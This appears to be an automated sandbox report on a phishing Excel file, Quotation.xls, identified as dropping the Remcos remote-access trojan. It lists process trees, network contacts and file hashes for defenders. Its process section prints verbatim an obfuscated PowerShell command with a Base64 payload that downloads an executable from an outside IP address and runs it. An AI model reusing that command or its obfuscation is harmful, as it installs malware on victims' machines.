Malware Analysis Report

2025-01-02 03:28

Sample ID 240724-k3bc6ayajj
Target Quotation.xls
SHA256 c0484101a8ad9d96190d39f100d6a6ed337873df68eb587c74a91b5cdd19cdd5
Tags
remcos 2556 defense_evasion discovery execution phishing rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c0484101a8ad9d96190d39f100d6a6ed337873df68eb587c74a91b5cdd19cdd5

Threat Level: Known bad

The file Quotation.xls was found to be: Known bad.

Malicious Activity Summary

remcos 2556 defense_evasion discovery execution phishing rat

Process spawned unexpected child process

Remcos

Evasion via Device Credential Deployment

Blocklisted process makes network request

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Drops file in System32 directory

Suspicious use of SetThreadContext

Detected phishing page

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

Uses Volume Shadow Copy WMI provider

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-24 09:07

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-24 09:07

Reported

2024-07-24 09:09

Platform

win7-20240704-en

Max time kernel

149s

Max time network

134s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls

Signatures

Remcos

rat remcos

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\winiti.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1968 set thread context of 2928 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Detected phishing page

phishing

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2628 wrote to memory of 588 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2628 wrote to memory of 588 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2628 wrote to memory of 588 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2628 wrote to memory of 588 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 588 wrote to memory of 884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 588 wrote to memory of 884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 884 wrote to memory of 1052 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 884 wrote to memory of 1052 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 884 wrote to memory of 1052 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 884 wrote to memory of 1052 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1052 wrote to memory of 1876 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1052 wrote to memory of 1876 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1052 wrote to memory of 1876 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1052 wrote to memory of 1876 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 884 wrote to memory of 1968 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\winiti.exe
PID 884 wrote to memory of 1968 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\winiti.exe
PID 884 wrote to memory of 1968 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\winiti.exe
PID 884 wrote to memory of 1968 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\winiti.exe
PID 1968 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1968 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1968 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1968 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1968 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 1968 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 1968 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 1968 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 1968 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 1968 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 1968 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 1968 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 1968 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 1968 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 1968 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 1968 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 1968 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 1968 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
PID 1968 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1968 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1968 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1968 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1968 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1968 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1968 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1968 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1968 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1968 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1968 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1968 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 1968 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Roaming\winiti.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'JDVYWE5WZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJERUZpbml0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdLbU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFljSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1FpSEtBVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtGWmN1cW5tYWNILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYU3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeVVjSHZ3QnF1TWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNVhYTlZlOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDIzMDdXL2NzcnNzLmV4ZSIsIiRFTlY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1NUYXJULVNMZUVwKDMpO3NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcd2luaXRpLmV4ZSI='+[chAR]0x22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'JDVYWE5WZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJERUZpbml0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdLbU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFljSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1FpSEtBVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtGWmN1cW5tYWNILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYU3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeVVjSHZ3QnF1TWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNVhYTlZlOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDIzMDdXL2NzcnNzLmV4ZSIsIiRFTlY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1NUYXJULVNMZUVwKDMpO3NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcd2luaXRpLmV4ZSI='+[chAR]0x22+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l6tmq1s6.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D74.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6D73.tmp"

C:\Users\Admin\AppData\Roaming\winiti.exe

"C:\Users\Admin\AppData\Roaming\winiti.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 tny.wtf udp
US 104.21.40.183:80 tny.wtf tcp
US 192.3.118.15:80 192.3.118.15 tcp
US 104.21.40.183:80 tny.wtf tcp
US 192.3.118.15:80 192.3.118.15 tcp
US 107.173.143.46:80 107.173.143.46 tcp
US 8.8.8.8:53 bossnacarpet.com udp
US 173.255.204.62:2556 bossnacarpet.com tcp
US 8.8.8.8:53 vegetachcnc.com udp
US 107.173.4.18:2556 vegetachcnc.com tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp

Files

memory/2848-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2848-1-0x000000007292D000-0x0000000072938000-memory.dmp

memory/2848-4-0x0000000002370000-0x0000000002372000-memory.dmp

memory/2628-3-0x00000000022F0000-0x00000000022F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2LF9I1AK\gdfc[1].hta

MD5 a183dcd47ab3d4ad39338dfe7eddff53
SHA1 4cd5c2dad4510df9516f6d16208bd284add559b5
SHA256 85c14a84e7c4d9e2b2ef10bc483f9ae22cfdf3438a2ae818dc8f487a0e455682
SHA512 8818b4d8d9bcd37b3d717c6309e825142ea2fd9f0cab68f4ca5232f38e444c90abb75a35e069018cfed867d48f267369bdab67a681a36633e264338adc943791

\??\c:\Users\Admin\AppData\Local\Temp\l6tmq1s6.cmdline

MD5 3fce564657419739a0491a5402a8c929
SHA1 f405e46f957bdf5d38b310fba68c8175c2acf36d
SHA256 47510126de9f30f68ac4fff997269741a20107c7e317800ab4b5e1e2c5688dca
SHA512 52b21784bf8520b7fa2e216cb3d925c5b0516c3c89bad08e17eba72ed63acdf655f1f88dd720ce8ab3b64dc0f28246c851bbda29aa16d603a76ae018aaa9c052

\??\c:\Users\Admin\AppData\Local\Temp\l6tmq1s6.0.cs

MD5 a83dc0e46bbad233951be9e3fdba130c
SHA1 892cfc6827bb1072ec2e26bbf83457497d6a17cb
SHA256 aa9a30262c1a7f73a50a10094b1c5eef9584cd05d275b2ed57430b3431aef967
SHA512 e02ef7f32d36925b4064b283c5dfe49b2db6fe0df092be7e3e4b3ba6501b840f4d7d86732f63dc4564514e8aef810edc40b42c982b9fb8356b2e5ab6fe580caa

\??\c:\Users\Admin\AppData\Local\Temp\CSC6D73.tmp

MD5 010033bada91ce77a8eae6c96c8627d2
SHA1 ee31b5cf1b1974b77766e6b3bccd730524e18a18
SHA256 bf4cc1b4b2f823aac74d3b7e3922fbde66c73a56ecda14d7be050f23f0e2223c
SHA512 04c6d9269b2a42fb35f83e707839ea1a01f0946d51d9e2e5ee6db668994b4bf75d030207ce7e77eeccf7060d726a00f455339d0011d84a274e6b2889a0ce1f2d

C:\Users\Admin\AppData\Local\Temp\RES6D74.tmp

MD5 cd9200e66a5fa073a5549f36efb35a50
SHA1 c5f1942415b254a8715c92888e19c4e2efbb689b
SHA256 beb64070aa5707651ed331e35b53cd295de898c0f547c28cbfe0155415a6a4dc
SHA512 0c9b6dd08ccf7524ed00f9ed2c871dd6a7ef36373c8d1603108dd60fd018237f57f7187561d3f36aa33664670993e70110f034c46617e702bd03720bca8212a0

C:\Users\Admin\AppData\Local\Temp\l6tmq1s6.dll

MD5 958fc6d7cff611120a9297af43662996
SHA1 f4b17148eedad42cdf26a1ccd7dc17f252450c68
SHA256 aee5f00d12d42d731fa43cbd0c39f2fac387c18f51a9c0332c45a6612c447db3
SHA512 a203a478aba35b3cf441f0fad42f708c618965767be9d4dd88f8e5267412fd5e45b11ba118f21af2a786b1fd47e006dc180da71087a20b8f3c36dc360cdf9fd7

C:\Users\Admin\AppData\Local\Temp\l6tmq1s6.pdb

MD5 e70684c20cbbb0ba7c7b8634a0727159
SHA1 14e5e9df9ad67a941cd7c0cd68f79f9d18d7b5ff
SHA256 ac4a8a14046d155b0a0bbcd1b0b19a7f79018d27c70e65957e768323a5db273d
SHA512 c2a4556f83a9fcae888b0fc67605ccd01919e6933626b26061e38b465d83519addb8fc9e4c72c5172a877a43bd76124fd86d80410b4dd5673190cd79df60dadb

C:\Users\Admin\AppData\Roaming\winiti.exe

MD5 f6bf8ada032d17192526ffebb48aed79
SHA1 362cb802e430115288638c9d613f00412f1b2519
SHA256 153e11471f85de3df5135b0445014698333ff40a9d6c488d291d6517eb19800d
SHA512 0a2e5dbcc972d8463a3cd0608bb837e232ed1dd909ea7472ade269abb0ae1d9dfbeecefe505caffabefed02af413ee156aa2917f0ac3547f1431183bfa99639c

memory/2928-37-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2928-36-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2928-38-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2928-39-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2848-40-0x000000007292D000-0x0000000072938000-memory.dmp

memory/2928-41-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2928-42-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2928-43-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2928-44-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2928-45-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2928-48-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2928-49-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2928-50-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2928-51-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2848-53-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2848-56-0x000000007292D000-0x0000000072938000-memory.dmp

memory/2928-57-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2928-58-0x0000000000400000-0x0000000000482000-memory.dmp

memory/2928-59-0x0000000000400000-0x0000000000482000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-24 09:07

Reported

2024-07-24 09:09

Platform

win10v2004-20240709-en

Max time kernel

145s

Max time network

151s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Quotation.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Detected phishing page

phishing

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1628 wrote to memory of 408 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 1628 wrote to memory of 408 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Quotation.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 64.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 tny.wtf udp
US 172.67.156.72:80 tny.wtf tcp
US 8.8.8.8:53 94.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 192.3.118.15:80 192.3.118.15 tcp
US 8.8.8.8:53 72.156.67.172.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 15.118.3.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

memory/1628-0-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp

memory/1628-1-0x00007FFE9A58D000-0x00007FFE9A58E000-memory.dmp

memory/1628-2-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp

